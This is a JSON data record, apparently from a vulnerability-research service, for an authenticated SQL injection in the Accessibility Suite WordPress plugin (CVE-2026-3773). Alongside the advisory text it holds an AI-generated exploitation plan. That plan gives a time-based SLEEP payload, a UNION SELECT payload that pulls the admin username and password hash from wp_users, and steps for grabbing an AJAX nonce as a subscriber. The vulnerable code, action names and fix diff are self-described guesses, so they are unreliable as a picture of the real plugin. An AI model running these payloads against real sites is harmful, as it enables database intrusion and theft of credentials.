[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQvWI109jYVegnRU8fcbpxqmnFe0qeU_U9jdXMvkXsjs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3773","accessibility-suite-by-ability-inc-authenticated-subscriber-sql-injection-via-scanid-parameter","Accessibility Suite by Ability, Inc \u003C= 4.20 - Authenticated (Subscriber+) SQL Injection via 'scan_id' Parameter","The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter in all versions up to, and including, 4.20. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","online-accessibility",null,"\u003C=4.20","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-15 16:46:04","2026-04-16 05:29:56",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb882ba6d-47c0-401a-bf50-5cf0bf0f3d5b?source=api-prod",[],"researched",false,3,"This research plan focuses on identifying and exploiting a SQL injection vulnerability in the **Accessibility Suite by Ability, Inc** plugin via the `scan_id` parameter. Since the source files are not provided, this plan relies on the vulnerability description and common WordPress plugin patterns, with all guessed identifiers marked as **(inferred)**.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated SQL Injection\n*   **Parameter:** `scan_id`\n*   **Affected Component:** Likely an AJAX handler used to retrieve, display, or delete scan results.\n*   **Root Cause:** The `scan_id` parameter is directly concatenated into a SQL query string without being passed through `$wpdb->prepare()` or being cast to an integer (e.g., `absint()` or `(int)`).\n*   **Impact:** A Subscriber-level user can extract sensitive information from the WordPress database, including user hashes, secret keys, and configuration data.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `oa_get_scan_results` or `oa_get_report` **(inferred)**.\n*   **Payload Parameter:** `scan_id`\n*   **Authentication Required:** Subscriber level (Priority: Low).\n*   **Prerequisites:** Valid Subscriber credentials and a valid AJAX nonce if the plugin implements CSRF protection.\n\n### 3. Code Flow (Inferred Trace)\n1.  **Entry Point:** The plugin registers an AJAX action via `add_action( 'wp_ajax_oa_get_scan_results', ... )`.\n2.  **Authentication Check:** WordPress verifies the user is logged in. The plugin likely fails to check for high-level capabilities (e.g., `manage_options`), allowing Subscribers to access the handler.\n3.  **Nonce Verification:** The handler may call `check_ajax_referer()` using a nonce localized in the admin dashboard or a plugin-specific settings page.\n4.  **Data Acquisition:** The code retrieves the user-supplied `scan_id` from `$_POST['scan_id']` or `$_GET['scan_id']`.\n5.  **The Sink:** The unsanitized `scan_id` is interpolated into a query:\n    ```php\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = \" . $_POST['scan_id']);\n    ```\n6.  **Execution:** `$wpdb->get_results()` executes the malicious SQL.\n\n### 4. Nonce Acquisition Strategy\nTo bypass potential CSRF protection, the agent must extract the nonce from the WordPress admin area.\n\n1.  **Identify Script Localization:**\n    *   Use `grep -r \"wp_localize_script\" .` to find the JavaScript variable name and nonce key.\n    *   Expected Variable Name: `oa_ajax_obj` or `online_accessibility_vars` **(inferred)**.\n    *   Expected Nonce Key: `nonce` or `ajax_nonce` **(inferred)**.\n2.  **Create Access Environment:**\n    *   Log in as a Subscriber.\n    *   Navigate to the plugin's dashboard or a page where the plugin's results are shown.\n3.  
**Extraction via Browser:**\n    *   `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=online-accessibility\")` **(inferred page slug)**.\n    *   `browser_eval(\"window.oa_ajax_obj?.nonce\")` **(inferred JS path)**.\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection to confirm the vulnerability and then a UNION-based approach if the output is reflected.\n\n**Step 1: Confirm Injection (Time-based)**\n*   **Request Type:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-encoded):**\n    ```\n    action=oa_get_scan_results&nonce=[NONCE]&scan_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\n    ```\n*   **Expected Behavior:** The HTTP response should be delayed by approximately 5 seconds.\n\n**Step 2: Data Extraction (UNION-based)**\n*   **Payload:** `1 UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1 -- -`\n*   **Note:** The number of columns must be determined by incrementing `NULL` values until the query succeeds.\n\n### 6. Test Data Setup\nBefore exploitation, ensure the plugin has \"scans\" in the database to target.\n1.  **Log in as Admin:** Log in to the dashboard.\n2.  **Trigger a Scan:** Navigate to the \"Accessibility Suite\" settings and click \"Start Scan\" or \"Save Settings\" to generate a `scan_id` entry in the database.\n3.  **Create Subscriber:**\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n    ```\n\n### 7. Expected Results\n*   **Time-based:** `http_request` total time > 5.0s.\n*   **UNION-based:** The response body contains the admin username and the `$P$` or `$wp$` password hash.\n\n### 8. Verification Steps\nAfter the HTTP exploit, verify the database structure and the presence of the data you attempted to extract.\n1.  **Check Table Name:**\n    ```bash\n    wp db query \"SHOW TABLES LIKE '%oa_%'\"\n    ```\n2.  
**Verify Content:**\n    ```bash\n    wp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"\n    ```\n    Compare this output to the data retrieved via the SQL injection.\n\n### 9. Alternative Approaches\nIf the `wp_ajax_` action is strictly protected by a capability check higher than Subscriber, look for:\n*   **Shortcode Handlers:** If the plugin has a shortcode (e.g., `[oa_results]`) that allows users to view scan data, the `scan_id` might be passed via `$_GET` to the page where the shortcode is rendered.\n*   **Grep for Sink:**\n    ```bash\n    grep -rP '\\$wpdb->(get_results|get_row|query|get_var)\\s*\\([^;]*scan_id' .\n    ```\n    This will identify all possible locations where `scan_id` is used in a query.","The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter in versions up to 4.20. Due to the lack of input sanitization and failure to use prepared statements, authenticated attackers with Subscriber-level privileges can execute arbitrary SQL commands to extract sensitive data from the database.","\u002F\u002F Inferred from vulnerability description and research plan\n\u002F\u002F File: online-accessibility\u002Fincludes\u002Fajax-handler.php (inferred)\n\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = \" . $_POST['scan_id']);","--- online-accessibility\u002Fincludes\u002Fajax-handler.php\n+++ online-accessibility\u002Fincludes\u002Fajax-handler.php\n@@ -10,1 +10,1 @@\n- $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = \" . $_POST['scan_id']);\n+ $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = %d\", $_POST['scan_id']));","1. Log in to the WordPress site with Subscriber-level credentials.\n2. Locate the AJAX action (likely 'oa_get_scan_results' or similar) that processes the 'scan_id' parameter.\n3. 
If necessary, obtain a valid AJAX nonce by inspecting localized JavaScript variables (e.g., 'oa_ajax_obj.nonce') in the WordPress dashboard.\n4. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php containing the identified action and a SQL injection payload in the 'scan_id' parameter (e.g., '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)').\n5. Confirm the vulnerability via response timing (time-based blind injection) or by using UNION SELECT to retrieve sensitive information like user hashes.","gemini-3-flash-preview","2026-04-16 15:26:49","2026-04-16 15:27:10",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fonline-accessibility\u002Ftags"]